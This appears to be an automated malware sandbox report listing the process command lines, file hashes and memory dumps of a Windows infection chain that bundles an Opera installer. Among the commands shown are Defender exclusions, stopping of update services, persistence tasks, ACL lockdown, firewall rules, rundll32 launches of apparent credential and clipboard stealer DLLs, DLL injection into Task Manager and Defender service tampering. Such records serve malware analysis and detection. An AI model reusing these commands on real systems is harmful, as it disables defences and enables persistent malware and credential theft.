C:\Users\Admin\AppData\Local\Temp\is-PL13U.tmp\f2aWE99yFgIVRBiiaEPY6g1L.tmp

"C:\Users\Admin\AppData\Local\Temp\is-PL13U.tmp\f2aWE99yFgIVRBiiaEPY6g1L.tmp" /SL5="$50278,491750,408064,C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe"

C:\Users\Admin\Pictures\tPBVrOz9nznq7EI1j7HnHSNW.exe

"C:\Users\Admin\Pictures\tPBVrOz9nznq7EI1j7HnHSNW.exe"

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6f4f8538,0x6f4f8548,0x6f4f8554

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ErUlK6xejTvgF1mGobsQGIri.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ErUlK6xejTvgF1mGobsQGIri.exe" --version

C:\Users\Admin\AppData\Local\Temp\is-6IF8E.tmp\_isetup\_setup64.tmp

helper 105 0x3C8

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

"C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2512 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231005034119" --session-guid=1e9b6d0b-0d5b-4968-9490-bbdc142c9342 --server-tracking-blob=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 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C04000000000000

C:\Users\Admin\AppData\Local\Temp\is-IUM7O.tmp\iAR3NEjxEx9jqAJE43HxlJxh.tmp

"C:\Users\Admin\AppData\Local\Temp\is-IUM7O.tmp\iAR3NEjxEx9jqAJE43HxlJxh.tmp" /SL5="$801F8,5025136,832512,C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6dad8538,0x6dad8548,0x6dad8554

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Windows\system32\schtasks.exe

"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4204 -s 2240

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe

"C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\07-19e1b-f63-ad5bc-9c3e8653caf7d\Kizhigobaely.exe

"C:\Users\Admin\AppData\Local\Temp\07-19e1b-f63-ad5bc-9c3e8653caf7d\Kizhigobaely.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 716

C:\Users\Admin\AppData\Local\Temp\is-31GRO.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-31GRO.tmp\lightcleaner.tmp" /SL5="$302E6,833775,56832,C:\Program Files\Windows Defender Advanced Threat Protection\WGNGCLTPEK\lightcleaner.exe" /VERYSILENT

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe" --version

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310050341191\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.21 --initial-client-data=0x24c,0x250,0x254,0x248,0x224,0xa7e8a0,0xa7e8b0,0xa7e8bc

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1085025563.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca

C:\Users\Admin\AppData\Local\Temp\1085025563.exe

"C:\Users\Admin\AppData\Local\Temp\1085025563.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 1808

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "zlwXiUU8CKJFMILgAs1ACet7.exe" /f & erase "C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "zlwXiUU8CKJFMILgAs1ACet7.exe" /f

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\1085025563.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe

"C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe"

C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe

"C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

Network


Files

C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\gjwq6wInRiTi5nh9dyb8OlC6.exe

MD5 dde72ae232dc63298465861482d7bb93
SHA1 557c5dbebc35bc82280e2a744a03ce5e78b3e6fb
SHA256 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
SHA512 389eb8f7b18fcdd1a6f275ff8acad211a10445ff412221796cd645c9a6458719cced553561e2b4d438783459d02e494d5140c0d85f2b3df617b7b2e031d234b2

C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

memory/4892-99-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\AppData\Local\uSJZuJDqZaKK6Ix0Fuqm5ypN.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\ina6e7ApYnFuunE29m4Lsvr8.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

memory/3820-63-0x0000000007EA0000-0x0000000007F16000-memory.dmp

memory/3256-115-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

MD5 98e1435808fa674502e204274664244d
SHA1 695b99b0b0e8918792481763d2aa62270e0857fd
SHA256 1ca53111921935d617e41ce984fb1a68aabb265165668bf0c2d35fb2f73eaf10
SHA512 47c6cb2571269863d85530b9497c230b20fb32cb62f754edbf14b03b87ae154866bebc2844fa7f05537422705626357cf3f58086670ece1370fc94bb9b4b281d

memory/4204-130-0x0000000000400000-0x000000000071C000-memory.dmp

C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v5l5wg1r.jyj.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4204-109-0x00000000740B0000-0x000000007479E000-memory.dmp

C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

\Users\Admin\AppData\Local\Temp\Opera_installer_2310050341168882512.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

memory/2408-150-0x00007FF6972A0000-0x00007FF69738C000-memory.dmp

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

MD5 98e1435808fa674502e204274664244d
SHA1 695b99b0b0e8918792481763d2aa62270e0857fd
SHA256 1ca53111921935d617e41ce984fb1a68aabb265165668bf0c2d35fb2f73eaf10
